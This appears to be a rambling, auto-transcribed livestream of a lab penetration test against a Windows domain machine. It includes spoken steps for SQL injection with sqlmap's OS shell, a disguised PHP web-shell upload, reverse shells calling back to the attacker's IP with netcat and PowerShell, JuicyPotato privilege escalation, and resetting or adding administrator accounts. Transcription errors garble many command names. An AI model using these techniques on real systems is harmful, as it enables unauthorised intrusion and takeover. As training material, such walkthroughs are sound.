anonymous user doesn't have rights to any sensitive folders and group policy. But you have to, you don't have to do it, but it makes life easier on all of your peeps that are in Active Directory. So I've done XMB client. I could do DNS because we have DNS, what do I call it? DNS enum. I can do DNS because we have windomain.local, I think. Am I right on that? Yeah, I think I am. So I'm gonna do NS lookup server 192.168.182. Okay, and domain.local. Yeah, it's correct. But I did also get this address. So that's good. If I ever have to pivot, I don't think I'll have to do that here. So 192.168.182. Okay, whatever. 127.0.0.1. And then that's what we get for that. So exit there, and I want to do a zone transfer next. Oh, what are you doing? I'm going to do a zone transfer next. Transfer failed, and then you can just do it any. And this one just like, actually don't know what any does. We have windowmain.local, DC windowmain.local. So none of this is super useful because of Windows. So what we could do now is clear. We need to run an mmap again because I lost the output. So R mmap. And then I need to do a -p dash there. So there was 443 open, so we can load that up. Maybe that's the way in. I do want to see if WinRM is open first. What? I don't want to wait for my mmap to come back. So all I have to do is 192.168.182. I didn't want to do that. 5985, and then take the S off of this. So WinRM is open. If you don't know that technique, it's like when you get 404 found, when you try to navigate to 5985, that means WinRM is open. WinRM is typically not open to the public when you are on an engagement, so just know that. You're not gonna have WinRM open. It's pointless. But when you do these types of exercises, WinRM will be open. In fact, every time we go anywhere, we have to ask WinRM to be enabled, period. So just know that. This is Victor. This is a content management service. So this is dope. Whatever the case. Admin. This looks like it's PHP. View page source. 2016. Interesting. And then we have a bunch of lorem ipsum or whatever they call it. We try admin. Nothing. We're gonna go back here, and I think we have our first. What are we trying to say? We have our first username. So what we could do is get. It's not gonna pop up for me. Get np. I don't have them. I don't have them symbolically linked. So let's look for locate get np users.py. So it's here. So what we could do is do I want? No, I don't want this one. What? I don't know. Something weird's happening. Okay. So I have two works, which I don't understand that. But what I want to do is, well, I don't want to do that now because that's gonna. I don't really remember my syntax because I had everything in my last computer and it was just all good. Why is this clear? Bro, let's start over. Boom. Didn't do it again. Locate get it np users.py. I don't remember my syntax for this. I don't know. Whenever that decides to act right, we'll try to cover roast and AS rep roast Victor. I don't know if Victor has a last name here. But what we can also do is, if we're going to web app direction, we could go Buster. Dang, I ain't got nothing in here. Commander, dir, HTTP, 192.168.1.82.80. And we need to run this command, but we need to add a K on it. And then we need to add S here. Connection refused. Oh, because of things. All right, so we have PHP my admin, but that's forbidden. Excuse me. We got a bunch of permitted. I have a 200 on admin, but that's the same as index, so that's not interesting. Get attributes. Are we going that route? 106. Hopefully we're not going that route. because it would take a longer than an hour to. What's it supposed to mean? I don't know what it's supposed to be. I never seen it before. Admin. Yes. Nothing there, I don't think. What number of Apache are we on? To, I don't know. Get attributes. Two, 4, 5, 2. I don't know. 5, 2. I don't see anything. Yep. Don't see anything for that. Let's go back to. I'm not following a tight methodology today for some reason. But I normally do follow a very strict methodology. And if I look at my Nmap, which is not back yet, I do know. Let's try get NP users really quick. And then be win domain dot local slash Victor, and I think it's just no pass. Name or service not known. So commander host. I hope you guys can hear me. I know my microphone is not 182, and then when now this should work. Client not found. So Victor is not found in the database, so that's probably not the correct way to first name register. We didn't even think about this, so I'm gonna do username of admin, first name, first, last, root at win domain dot local, and then password super generic. Now that we've registered, we should be able to log in. What was the username again? I forgot. Yes, admin. So we have this. We have first dot last CMS admin page. Y'all comments. Let's look at the comments. Victor. Oh, thank you for that. First and last name. JP. That's a JP too. So what we could do. Let's go back here. And say B A L A G. What was it? Oh. Client not found. Let's try V dot. Client not found. And then let's try Victor like that. Client not found. And then we could try so we've tried. Oh, we haven't tried this one. Client not found. And then we'll try Victor A. And then if that one doesn't work, we're gonna move on. Client not found. So we tried that naming convention, that one. We tried that one. We tried that one. And we tried that one. And then we also just tried Victor. Just make sure we're spelling it correctly, because that would be embarrassing. GWU. All right. So, yep. Major rabbit hole there. But that's a good way to see if that's a valid user. Even if you don't get the ticket, you're seeing if it's a valid user name or not. And that is not. We'll keep going. JP, we have a JP here, but you all users. So we got more than just him. We got Henry, but we don't have a last name, I guess. We got passwords here. I don't know if we want to fool with these passwords. It look like they have salt on them. I don't know if I want to fool with that, because the way that my brain's set up, bro. John Paul. I don't know about that. Oh, John Paul, this guy. So we can try John Paul too. Let's try John Paul. So let's go back here. So first one was just John Paul. I found. Come on, man. We don't have a lot of time, man. ALAG. Probably screwed that up. ALAGWU. GWU. Client not found. Let's try. This. Let's try this. Try this. All right. Don't think the last name was different than the other ones. Let's go back and look at that, because I might have missed that. A lagwoo there. We have hacker. We have rod. And we have me. We have certain, what is that? Surname demo? I don't know. Oh, we have images too. I don't think images is gonna give me far. Change to admin. How do you? Yeah. Okay. Whatever. Edit. Let's edit something. So we viewed all users. Password Rod here. And he's an admin. Okay. Let's log out. Rod. What was it? That wasn't it. $37 minutes. Password. Let's go back to the users again. Rod was username. That's what I typed. Rod was the username. Rod was the password, and it said it was incorrect. Is he active? He's an active user. Rod password. Unless you did this box. Rodnet. I don't know. That's quite a coincidence. Username Rod, password Rod. Let's log out and try that again. Rod. No dice. So I don't understand how that could be a thing. let's look around a little bit more because I don't want to spend too much time here for not finding anything. Add posts. So this content management. Nope. Profile. Typically, there's some type of leave a comment. I didn't even see that. So I'm gonna try to do hood red stuff with this comment form thing. And I'm gonna go straight to cross-site scripting. See if I can get a cookie or something. Not you. Here you go. I'm just gonna try all of these. Can everybody see that? I know it's like, I don't know if you can see that. I'm just working super fast sometimes. All right, let's try this one. And then roots at whatever dot whatever. Did we get anything? You have an error in your SQL syntax. Okay. Check the manual that corresponds to your Maria DB server version for your right to use near whatever. So I don't know what version of Maria DB that is, but what I'm gonna do is take. I'm gonna take. Even if I do SQL injection here, I don't know what we're dumping here unless I get a shell. We'll do that. Just do test, and then where is? I don't even have Burp Suite on. I mean, not Burp Suite. Foxy Proxy. I thought I put Foxy Proxy on here already. Add. This might be a giant rabbit hole too, but luckily it won't take very long to do. Like I don't have to manually do SQL injection. But I would tell you on the OSCP, if you're looking to train for the OSCP, do not use SQL map unless you get explicit permission to do so. I don't think that's allowed, but I'm about to use SQL map just so that you know. This is one of those things that you can run in the background, meaning that even if it's a rabbit hole, it's not much of a time investment. So, but yeah, again, you don't want to run stuff like this on the OSCP unless you get permission or if you know for sure you can run it. So while that loads up, I'm running out of ideas. I can't lie. So this is actually what I wanted. I wanted a challenge, and you can't just like, let's go back. The last one that I did from I.T Security Labs, I just cover roasted the Vagrant user, or AS rep roasted them. Not Victor, Vagrant. Maybe I can't crack the hash. Okay, got you. I'm not gonna do that then. I'm gonna close that. All right, I'm gonna keep going. So if that's the case, I'm just not gonna take that avenue at all. So I don't know. After the time is up, if I don't get it, we'll go back to that. Cause yeah, that's not very interesting. Like, especially if I'm doing that twice in a row. So yeah. Test at test.com. What? Oh, it's not. But I would tell you, OSCP, if I'm taking that, I don't care. I'm just trying to, like, get in, right? But we want to actually see the intended route here. What are you talking about? Send. Oh, this is encrypted, so I didn't even think about that. You can't. What? How is that possible? I shouldn't be able to intercept if there is. I'm not gonna look into it. Screw it. Okay, so I'm gonna save this and then into DC Live Challenge. And then I'm gonna do like what we doing here? Comments .req. And I know that I probably shouldn't be able to dump users here, but maybe I can get a shell, so it is somewhat valid. SQL map R comments REQ level 3. Is it? I get this confused every time. That might not be right. Oh, and I need to do like shell, I think. I don't know. What? Okay, maybe not do the shell thing right now. Oh, so risk is 3 and then level 5. Oh, I gotta do batch. So I want to see how you do SQL map and shell. So I might be screwing that up. Before I do it, man, I automatically run to Google. That's a bad habit. It's OS shell. Oh, and then batch. And then we can set that and forget it. And then look at other ways to get in. Stop intercepting. All right. So it says Victor CMS, but this looks an awful lot like WordPress. Oh, what are you talking about here? Okay. Did it at least say that something was injectable? So you got 3 here. So we'll just let it, we'll see if it can dump anything interesting. I think it's like dump or something. I don't know. Maybe this isn't even the intended route, but see what we can get. Yes. Oh, we got some stuff. We got some hashes there. All right. I don't know. I hope it doesn't do it all weird. I don't see anything different here. So I wonder though, I wonder if my Nmap came back. It did. And so I may be able to just log into the server. Was it 9,000? There's a 9,000? Ouch. Okay. There's a 9,000. There's my SQL. I need to at least attempt. Oh, never mind. Not allowed to connect to this server, so just to make sure that I'm in the 72. Yes, so I'm not allowed to connect to it like that, so pointless there. To try to get into the server from the outside. I don't think there's anything interesting, even though we just dumped a lot of data. I think everything we've dumped is what we could already see. I don't know why I didn't come out prettier than that. I think we could do a yeah, I'm getting rabbit hole vibes here. I think we could do just like we can do that. So we got localhost stuff. Okay. What else do we have? Yeah. Rabbit hole. I'll probably revisit it if think of anything. But what I want to do is I want to open up a new one. What time we got? WP scan. I don't know the syntax here. 192.168.182. I don't know the syntax, so I probably should look that up. WP scan help or something. It's just not working, bro. Period. Oh, there it is. What do we get here? Oh. Seems to be down just because I didn't give you the right. I don't know if we can do that. Was not okay. Can we do this? All right. Scanning. We scan with SSL. Can we do that? Because the thing is, I think it's just on port 4443, because we were able to get a. We shouldn't be able to intercept it if it's encrypted. So can we do like port here? P. Okay. Does not seem to be running WordPress. So maybe I was just. Let me look, because it looks familiar. Is it Is Victor a content management system? Probably so. I don't know. Forgive me if I'm ignorant here. Content management system. No, it is not. Yes, it is. GitHub. Scanner. Okay, nothing's there. We can go back to this exploit thing. SQL injection, we already did that. So, okay, so Victor in itself, I thought Victor was. You can't really get anything, though. Like, okay, you're not getting anything. No, there's nothing there interesting. That's interesting. I mean, if I can go ahead and log in and then see everything. I don't know if anybody else has any other thoughts, but I don't see, and I'll make that bigger for everyone so they can see it. Yeah, even if you dumped it, like, how am I getting past anything with that data? I don't see it. Even if it did have even if it did have the database password in there, I can't log in from where I am. So it's not really very helpful there. File upload. That's probably what we want here. Oh, okay. It's PHP, so I mean, let's try that. I haven't done that in a long time. But how I would do this is go back here. I'm gonna log in again. I can't believe the rod password didn't work. Advanced. Accept the risk and continue. I can't believe that doesn't work. What? Let me see if. See what the certificate says. Nothing. I don't see anything. They keep bugging me about a certificate and there's nothing here. I don't know. Stop bugging me about a certificate. Your certificate. Nothing. All right. I need to, 17 minutes? browse, and I could upload stuff. So there is a JPEG PHP shell. And so if I download this, and man, if this works in my SQL results, what's up? I didn't see anything. I don't know if you saw anything right there, but I didn't see anything that I could use. I saw some salted passwords. And I don't know if that's the route. Then open containing folder. So I'm gonna just try to upload a straight PHP shell first. I don't see anything. So next thing that I could do, how did we do that last time? Oh, it's a JPEG. It has JPEG magic bytes, if I'm not mistaken. So we should be good here. Probably a rabbit hole. I don't want to spend too much time here. So, but if you look at it, cat shell.php, these first few things are magic bytes. So if the any emails, I can go back and check. Yes, so we could just move this from shell to shell.php.jpg. Let's go back. This is one thing that I forgot to do. Page info, no. Library, no. What am I missing here? So I need to get wherever this is. All right, I'm confusing myself now. Unless it's on this page. Nope. All right. So I'm gonna go back and look at that do SQL map again. This time I'm gonna let it dump again. And then while that's dump, okay. It just dumped just that fast that time. They have a bunch of test.coms. And then these emails I can already see them in the I can already see these in what are we talking about here? The website. And then as a hacker email, but I'm only interested in people that are admins too. And the only person that I saw without a salted hash that had that could be admin, let's go back, was Rod. See, Rod is admin. Doesn't look like he has a password. Oh. Is that a thing? Let's try it. Because this is mine. Try it. Bro. Was that 11 minutes? So nothing that can help you AS rep. So I mean, we did get Vagrant, so I'm gonna try Vagrant after we run out of time. Username. So maybe it's case sensitive. Yep, nothing. John Paul. Let's see. So I should have view users. Where am I? User image. So it didn't upload. Let's try one more time. Profile. Browse this thing. Update user. I didn't like that. Users. Back to users. Your users. Nothing there. I have an add users. Maybe I can add an admin. Yeah, I don't know. Don't make me select a file. Okay, they let me add an admin, so there you go. So username is me, password is password. What? You gotta be kidding me. Let me see. Like, yeah, I don't understand that part. Let me try to view all users and let me edit this guy then. See if I can do that. Nope, don't let you. Rod, don't let you. Let me edit myself. Don't let you. That's whack. It don't even tell you. Whack. All right. Rabbit hole. Add category. Welcome to the comment page. All right. So I'm losing faith here. Let's go back to our Victor CMS. File upload to RCE is what I see here. I did that. You will find your shell in an image folder, path image. But this isn't. I don't know. Man, come on. System is acting slow today. So yeah, that's not found. Let's try. Oh, because I didn't load it up as that. It was like shell. Okay. Let's see if there is even a directory at all. Let's try this image. Oh, it's here. Oh, might not work though. Hey. Yes, sir. 6 minutes left though. So what I could do is come back, Commander IEX. 192.168.1.72, I think I am. IPA. That took a while to find. Hopefully I don't have to pay for that. Oh, I have to put the file in here. Shell, right? .ps1. That's not right. I need to change the IP here. Copy. Back here. Web app. And then, what was I again? Man, I got bad memory today. 72. How much time? 4 minutes, dude. Actually, I don't want to serve on that. I want to serve on 8888. I don't think I have anything set up. Clear, CD, okay, work, ls, CD, ACB, CD, dub, clear, boom, shell.ps1. And then down at the bottom, 192.168.172. Oh, chain read only file. What's up with that? One nine two one six eight 72 443, and then I could say sudo netcat lvp 443 here. I feel like that's not it. I also have to come back to that same place and do home Cali work HTTP dub. And then only now Python M HTTP server 8888. Why don't you go somewhere, man? 8888, boom. Did that work? Clear APA 192.168.172. Is that not what I did? This is whack. What can I do? net user vagrants. Did that work? I don't have any way to know if that worked or not. So we have to just do evil when our him, you, vagrants, P, password, 1234, bang. What's the IP? I 192.168.182. I think. I don't know if they're going to tell me if I'm right or wrong here. Yeah, probably didn't work. Yep, it didn't work. So we can't change anything like my/priv. We have impersonate privilege. So that's interesting. Very interesting. System info. Where were we? 2016. Let's see if we can wget. There we go. Man. I was getting it, man. So I got a shell on the box. All right, man. That's as far as we got. I don't know if anybody's wants me to continue here, but it seems like you don't like really catch on until like the very end. But I need to understand all I really need to do. Who am I? HTTP. So I should be able to Kerberos. I should be able to AS rep roast this user. Or Kerberos this user. And the reason I should be able to do that is because HTTP service should have a what's called a service principal name associated with it. So let's try that. It's not the NP users one, it's the other one. I can never think of them. I use them a lot, but I always mix them up. NP users is one. It's something like, I gotta watch my own video to come up with what I'm talking about here. Man, sometimes like, especially in the morning, I'm like, man, I can't remember all of this stuff, man. So if you're just joining, we did not reach our goal, but we were getting pretty darn close. Tell you that. Where's my shorts? I did it in like shorts format. Sometimes I make videos for myself because I forget. So I feel like if I make a video and I would use it, then it's useful. User SPNs. That's what it is. Get user SPNs .py requests DC IP 192.168.182, and then win domain.local / HTTP SCV. We don't have a password. Let's try no pass. You gotta be kidding me. Did I spell it wrong? Okay. Let's just do this then. Oh, you know what? Let's do this. Come copy home. This is gonna be like super dramatic, but I'm super impatient. Star into user local bin. And then we might need sudo. Now this should work. Invalid credentials. So it wants a password. Let's see if we can go back. I know I'm over 75 minutes, but I just want to see if this works. Net user SVC password 1234 bang. I don't have any standard errors, so I don't know if that worked or not. All I could do is invalid credentials still. So that didn't work either. Yep, that didn't work. So from here, I'll tell you what I would do if I were to continue. I would go the juicy potato and rotten potato route. And then I would also, I think one of the things that I could do should be fairly easy. I don't want to go the juicy potato or rotten potato route. But I do have a shell here. That's pretty dope. Let's look around. There should be a folder. Is it PowerShell? What am I using here? I don't know. Get child item. Not using PowerShell. There's PowerShell even on this box. That's why I didn't get my payload back. Because I didn't do my this correctly. So I was actually supposed to do PowerShell C and then double quote that. And then if everything else is listening, this should work. And sudo cat p. And then going back to this. Not you. Yeah, now that worked. I think it takes a while actually. I don't think it works right off. But let's just make sure 8888. I think it takes a while. RPA 172 8888 443 city home carry work HTTP www. Let's just make sure everything was good here. Yep, everything was good. So we should just, it should be a matter of time. There's a shell. There's listening. 443. Right. That is right? 172. .443. That's 443. I don't know. For some reason, I feel like I might be doing something wrong here. Check users and AS rep. Ooh, now that is. I could do that. I wanted to see if I can get at least the shell back. There's no reason why this shouldn't work here. I don't know, but that should work. And then I'll be able to do hood rat stuff. So I'm not sure why I didn't get a call back, but yep. So Rodnet is right. I could go ahead and from this window. Let me see where I was. From this window, I could just say, I don't know. I just got this weird feeling that I'm going to get a call back at some point. Guess it doesn't matter though. But stop that. Stop that. You stop that right now. Let's stop that. We don't care anymore. What was I going to say? Yes. So I could just go ahead and net user domain, get all of these users, and then I could run through them one by one to see if, and I probably will at some point, if one of them will come back. I got to do some spring cleaning here because I don't know. Either one is fine. So I got to go vim users.text and then paste, and you see how they're pasted, right? So I got to actually do something with this list so that it's not like this. Cat users.text. I could do something like I don't know what I could do here. I could replace if these are, let's see, cat users.text said. Going with said again. I think it's S. First of all, let's do commander so that we sure we can replace. I think it's T with new line. Maybe this works. I don't know. Said. Maybe you need to escape these. Maybe you need to double escape them. Nope. Let's just make sure we are doing the tab correctly. Said tab. But tab is $, a quoted $, and then the T. There's no way that I could have knew that. T. And then replace it with test. So that may be more than one. Let's just do these. Okay. I don't know what the hell's going on here. But there should be a way. Actually, it's probably better if I do that with Vim. Because now I could actually see if my thing is working. Yes. What? Oh, that's right. But I just looked at it. Okay. So tab. Dollar sign. Tab. Okay. Yep. I don't know what. Yep. I don't know. I don't know how to do that. Second for third. Yeah, I don't know how to replace that. I could do. Let's go back. Can I just? Yeah, I could do this in PowerShell easily. So, as a matter of fact, let's just do that. I made a comment above the second and third. Oh, what does that mean? The second and third. Row. Yeah, I'm a little bit more adept with PowerShell than I am with Bash, so we could probably make this happen. You think I should go ahead and try to ASRep roast that vagrant user though? Users equals home. What? Don't do me like that. Yeah. Clear and users. Splits. One of those. Okay. I think this is how you do a new line. Yep. So that's how you do a new line. So that was how you do a tab. And apparently it's not considering these tabs, which I thought it would. So, yep, it's not. We can just replace all the space. I don't know if we can do regex here. Yeah, I don't know. Nope. Vagrant user, I'll show up. It'll show up when you ASRep. Okay. So it was the vagrant user again. Did you get the password? So I guess you went ahead and got the list. I don't know. Maybe I'm a little bit tired, but there's a few ways that I would go about that. Just go about it the right way. So the vagrant user has something on his desktop. Let us go back to the. I'm a mess today. Let's go back to the ASRep roast attempt. I don't. Maybe he's trying to teach people to like be really good ASRep roasters. I don't know. And then you just do I think I already have the hash in here. Okay, maybe not. Vim hash. Paste. What? Did I do it right? I don't remember. Yeah. I do want to, if I were to continue down this path, I could show you my next step that I would do here. My next step that would be here. I think I should have gotten my PowerShell reverse thingy, but I don't want a netcat shell, but that's what I'm going to resort to because I don't want to wait anymore for my PowerShell. But I would do home, Kali, work, HTTP, dub, and I have a netcat in here. I try to encourage people to not go the netcat route if they don't have to, but I just want to go ahead and get into the box. So what I'm going to do is I'm going to serve Python M HTTP server on whatever port, 8,000. And then I'm going to go back to my window. What is all of this irrelevant stuff? Like a good hacker would have already seen that file upload. I wasn't paying attention. wget http 2168.172.8,000 netcat. I think it's just regular netcat, right? 64 maybe. Try 64. C and then O C program data netcat.exe. And we can do exec. Let's see if that worked. Did I do 8,000? Oh, that's right. You can't do wget because I don't have PowerShell yet. So you can't just do wget. You gotta do wget like this. PowerShell C. So now should be getting wget at some point. Let me get 8,000. Yes. What? Maybe PowerShell is like constrained language mode or something. So we could just try, I think curl works, maybe. Curl works. I don't know. I don't know if curl works. No. Let's see if we have any connectivity at all. Tag N1, 192.168.172. It's like maybe it's acting on behalf of the other interface. So sudo TCP dump eth0 and then ICMP. So it can see me perfectly. Let's see if I can see it. Yes, so there is a connection there, but I got 2 pings, 3 pings. Okay. So let's try. Let's try this again. serving on 8888 as well. 8888. Yeah, maybe I think PowerShell is in some kind of weird language mode, which you do get this sometimes. So this isn't like some weird thing. Okay, that worked. So maybe it's you just have to do double quotes. Netcat, I think I already have a 443 listening. So I probably should have went with the interpreter shell if that's the case. Oh, well, what's this? It's PowerShell. Okay, well, we have a PowerShell shell. I don't really I think it's very reliable here, but we're here. And what I would have done next, but the challenge is over. I lost the challenge. But I would wget http 192.168.172 and then 888 slash what was it? Oh, it's gonna have to listen. I think it's print spoofer exe. Spoofer exe. And this is the lazy route. Let's call it print spoofer.exe. No way that worked that quick. It did. Wow. So I'm going to go into my notes to look up the syntax for print spoofer. Oh, I think yep. Man, I never remember this command either. So here I'm abusing the impersonation privileges, and then it's just, this may work, this may not work. This normally works on newer versions of Windows. Yep. Yep, it normally works on newer versions. I.C. Let's try PowerShell. Yep. So what I could do instead of that is juicy potato. But I think this is a little bit more involved. Yep, it is, but we could try it. what is it? Git clone. And then just go to Juicy Potato. But why so many? Did I miss something? Do they want me to compile my own? They want me to compile my own executable. I don't like doing that. I'm just lazy. What is it, 2016? Three ways to juice a potato. Yeah, man, I didn't think we had to compile stuff because I guess it wouldn't be too much to go ahead and. If I get any types of errors though, it's like I'm not gonna be like with it at all. GCC, juicy potato, CP. I think. Juicy potato, DXC. Yep, don't even have it on my system. So there's that. So yeah, this is the way you do it though. Juicy potato or rotten potato. I just don't. There it is. I found the executable. Don't try this at home. Always compile your own stuff. Please do. Did that work correctly? Yes. Let's just double check. Juicy potato, exe, executable. Okay, it worked. I thought it saved it as some weird something else. So we're just gonna we can copy this. Juicy potato, exe into home Cali work HTTP dub. Oh man. And then now, instead of print spoofer, get HTTP 92168.72888/juicypotato.exe. Hoping. And just slash. I can't remember the syntax, but I just need to know that it's going to run on this system. Okay. That looks promising there. We can go back and look up the syntax for this thing. So I want you to do C potato L and then do your own port. I'm just gonna do delete port. And then I'm gonna call C Windows System 32 command.exe like they did. And I'm gonna do T start like they did, and then C. This might be the frustrating part because you have to pick the right CL SID. I don't know what that stands for, by the way. CL Security Identifier. Look, see how the live stream's doing. I know I'm just going on and on. But yeah, let's just see if this works. And then if not, I'm just gonna call it. They say I could choose anyone I want. Let's try this one. Paste. And then let's make sure we have all our ducks in a row before we push enter. Okay, it looks like I do. What? What does that mean? Okay, so I'm looking at bad oh. Dang. I just copy this then. I have to edit it somewhere else. I screwed that up. It's supposed to be P right there. Paste. Wrong argument somewhere. Is that a C? That's a P. That's an L. I think that's an L. Let's do it without that though, because I think it just defaults to a port if you don't do that. So the less the better, right? Still something's wrong. I think it's that. No, it says I can use star to try both. So that's correct. Okay, so maybe. Oh, you know what I think it is? I think when you paste from Windows to Linux, they give you weird characters. Like the dash just might not be the same or something. Okay, so that wasn't it. It says let me see. What's going on here? It's not even accepting my command. Let us let's do it without this. See if anything else is wrong. What did it say this time? Still another wrong argument. Nope, that's not it. What's the last one that I ran? Maybe we'll try create process as user. There's the program to launch. Oh, the L is mandatory. I thought it was whatever. L. So the T is mandatory, the P is mandatory, and the L is mandatory. So we have that now. Let's paste that in. It says okay. So what do I do next? I don't think I'm system yet. There's something I missed. I don't know. Maybe I don't know as much as I think I do. I thought you're supposed to be good from there. Unless net stats is I don't know what's taking that so long. Did that open a port? Oh, I think I know what I want to do. Can you run your process with arguments? I think I know what I want to do. Let's look up some examples. Hold on, I missed something. Yes, I missed a huge step. So I'm supposed to do. Hold on, let me see what's in here. Okay, let me see what's in C program data. Okay, so my netcat is there. So I was supposed to do an echo C program data netcat.exe ecmd.exe 192.168.172 and then 72 and then put it on a port like 4443 and then pass that to like let's call it privbat, and then over here start netcat lvmp 4443 and then come here was that at? Take this same thing here, but instead of doing it like that, I need to do see all of that. Let's just make sure priv.bat is in here. It is. So come here and say cxampp/htdocs priv.bat, and then you don't have to be a yeah, it could be the same. I think it could be the same port here. Paste. Says okay. We don't have anything. It's embarrassing. Let me see if the netcat even runs. Let's see. Program data. What's the other arguments? Yep. Okay. So we got the wrong one, I guess. The wrong netcat. So let us wget. Which one did I get? The 64 one? I did. So we'll get the other one. 192.168. 1.70. What? 2. Netcat exe. Oh, netcat exe. Netcat.exe is there. Do you have a listener set up? Yeah, I forgot to set up the listener, bro. Yeah, I could do that too. It's one of those days. And so we could do this, but now I have to change my C examp htdocs image / cat.exe cmd. I don't know about that syntax. I think it's this first 1.72. Type that into priv.bat. Then cat priv.bat. Make sure it made it. Paste. Make sure everything's good. Listening still. Now we can run this thing. Ugh. Let's see if this netcat is valid. Yes, it is. Netcat exe 192.168.1. Oh, I'm about to run my shell if I do this. I could try uploading MSFN and reverse shell. So and try running it with Juicy Potato. Let's do that. do that instead. Let's Commander MSF Venom. Think I do that? No, it doesn't take. I need to fix it so that it takes a and then we'll just do this one. No, we want to do this one actually. We don't want it to be a C2. We just want it to be a straight shot. I guess it doesn't really matter though. Copy. Let's just do this one. We have to change the port number. What's going on there? Bro, it is getting mad late. Oh. Don't do that. 192, 168, 172. Something's happening. So while that's happening, I could do that and say MSF console. Say thank you to that. Can't believe that didn't work. But yes, this works. It's just crazy for me right now. This is hectic right now. Maybe I need to change the port on this. Eight. Let's listen in on NetCat. Nothing, bro. Nothing. I just gotta try it. Cause I gotta just make sure that I'm not messed up here. Nope, wasn't messed up. So, yep, not messed up on that end. So the payload's working. Let's try this. But I don't know how to run batch files. Did either of my other things work finally? Yes. Use exploit multi-handler. Set port to 4443. Set L host to ETH0. Show options. Exploit J. What is that? Oh, because I'm already listening somewhere. No, I'm not. What are you talking about? Oh, I don't know what that means, but it finally started. So let's go back to our Metasploit payload again. Commander, MSF Venom. This one. I don't know why this isn't saving. Everything looks correct. But this is a new Cali too. Oh no. Let's try this one. What is that? Oh, it finally output. So it's there, shell exe. So all we have to do now is say wget http 192.168.172.888 shell.exe shell exe, and then like do a dir shell.exe is in here. So instead of all of that, let's just say echo c examp ht docs image shell.exe, pipe that in the priv.bat, then where is what I ran last? This better work. This better work. Oh. Try another port. Come on, man. Killing me, Smalls. Make sure Shell didn't get killed by like an antivirus or something. It probably ran. How do you look at? Yeah, it probably ran then, because I didn't get anything back. Ah, rookie mistake, bro. All right. 192.168.172 enter. It's gonna take a while. You gotta go here. Get the shell again. They're listening still. It is. The shell again. Okay. Do the same thing, but just call it shell 2. And then dir shell 2 echo c examp htdocs image shell 2 exe, pipe that into priv.bat cat priv.bat, and then I should probably take all of these live streams and chop them up into like, so that they're more useful and you don't have to like wait the whole thing. So juicy potato, they got an okay there. That time it was correct. Permission denied. Bro, I don't get it. Oh. Permission denied, yo. I'm still not getting anything back. That's 172-4443. Listening on 172-4443. And then maybe you don't want to use the same port again or something. 1340. Why are we using this port anyway? Let's do 7777. I don't know what to tell you. It just will not, for whatever reason. It seems to me that you know what? I could just, instead of doing that privat, that corny privat thing, I could just immediately call the shell though. I don't know why I didn't do that the first time. But I can't get my interpreter thing to connect anyway. Let's try stage list. Maybe stage list works. Okay. And I gotta do a wget again. But we gotta call this like Shelly. Let's call it something different. And then instead of doing it from, I don't know. I think this is what Rodnet was trying to tell me, but I was still trying to do it from privat. Privat might just be jacking it up. That it was like T and then L. I think it was like that. Nothing, bro. 172-443. Oh, finally. But I don't know what's going on here. Is it just gonna keep doing that? Wow. Yo, what the hell, bro? I don't know what's going on right now. I think it's because I tried to do. I'm gonna have to stop this process. Get process name equals Shelly. Hope that produces something. Yes. I think you could just do. Oh, wait a minute. Close. I think. Let's just stop it. Did that stop it? Yes. No, it did not. So I think you gotta do this. Kill. Oh no. Because it ran under system. Okay. We're just gonna have to deal with that. It's a thing that's happening. I don't want to reset the box. So as you see, it works, but I think everybody would rather see a working shell. I'm gonna have to go back to I don't know if I want to use another payload. Because the regular interpreter wasn't working. I made that one little change and I got a result. Maybe I could do reverse HTTP. Let's see if that works. We can't. We burned this port. By the way, like if you do this on an engagement, you caught, bro. You don't get caught. 192.168.172. To create an admin user. Why didn't I think of that? I could use a payload to run a command, and it could just change the admin password too. But I don't know what that is. Let's see what that is. And that would be far easier. Wait a minute. We have an even simpler solution than that. Let's do echo net user administrator password 1234 and then pipe that into priv.bat. I don't know if priv.bat is even working. What is that? Let's be case sensitive this time. htdocs image priv.bat t star l. We'll do 9999 this time. Then let's go into new eagle rm. I'm like, without my other Cali, U administrator, P password. Tell me it worked. That should have worked. This thing isn't running anything. It's not running that. It can't be. All right, let's look up the Venom, the MSF Venom. It said create admin. That should have worked. Okay, I need to put this in my I need to add this because this is way better. That should have worked. Paste. We'll just call it, we'll keep it that. Yeah, why not? Do exactly that. What? Why is it screwing me, man? It only wants me to save it as shell. I don't get that. I got some weird Chmod stuff going on over here. Did you add admin user to the RDP group? Well, I don't know. So the user that I had, if you add them, if you're in an administrators group, you should be good across the board. And as far as what I was doing, I'm gonna just try to do another thing here. As far as what I was doing, I was just trying to change the admin's password to something that I know. Indeed. Net user administrator. What are the permissions here? Bro, that's mad weird. All right, so we're gonna try to add the user Callie now. For some reason, it doesn't want me to add any, doesn't want me to save to any other file other than shell. I've never seen that before in my life. Okay, you can't save it as Shelly. Because we did actually kill that. Shello.exe. And then we have to go here. Juicy potato. cx slash shello exe. And then T, this thingy, and then L 8888. Net user Callie. Thank you. Thank you for that, man. I was gonna go crazy, like absolutely crazy. All right, so what was that? This is, you know how you want to be like, it's Callie 1 2 3 4. You want to be like smooth and do like a good live stream. It's like, I was just gonna show everybody this real quick and I was gonna call it a day, and like hours goes by and I'm still trying to fool with this thing. What's Cali1234? Cali1234 is the password. It should work. If I get this one, I'm going to take a different route. If I get an error here, but it's going to be with the same user. And is yes. Who I am? Who am I? And then, now I should be able to CD into. So yeah, juicy potato, everybody. I know it took a while, but. So here's the flag here. I think you got to decode it or something like that and everything. So we did it. It just took us way longer than 60 minutes. But if we would have, if we would have found out if we would have discovered the exploit, we would have been fine. I know I marketed this challenge as Active Directory, but we didn't do anything in Active Directory at all. So there's that. But if you want to see some Active Directory stuff, I could show you some real fast before we get off. Commander, blood. What are the parameters here? Username would be Cali. Password would be Cali1234. Domain would be window. What? Windomain? .local. And what's the NS? I forgot. Commander. Help. IP address is 192.168.182, and I don't want to be in this folder when I run this actually, because it's going to be a lot. Copy that, CD into work, home lab, and then we'll do make their DC challenge, and then we'll go into there, and then we'll just do, even though we're king of the castle now, we have domain admin, we can just get that. I'm just gonna still run Bloodhound because. What? I don't have Bloodhound Python on here. App install. I think that's the. Wow. Okay. I don't think I have Bloodhound on here at all. Now that I think about it. Oh man. I'm tripping, bro. Sudo app install Bloodhound. So I had to switch from VirtualBox to VMware. So that's what you're seeing right now, the after effect of that. So don't judge me. So I'm pretty sure that was the intended route. If not, I don't know. I'm curious to know what's the intended route. Yeah, I think I'm gonna end it here because, yeah, Bloodhound is not going so fast. So I'm gonna end the live stream here. We failed our 60-minute challenge, but we were not expecting to get in through web. So that's the thing. I'm 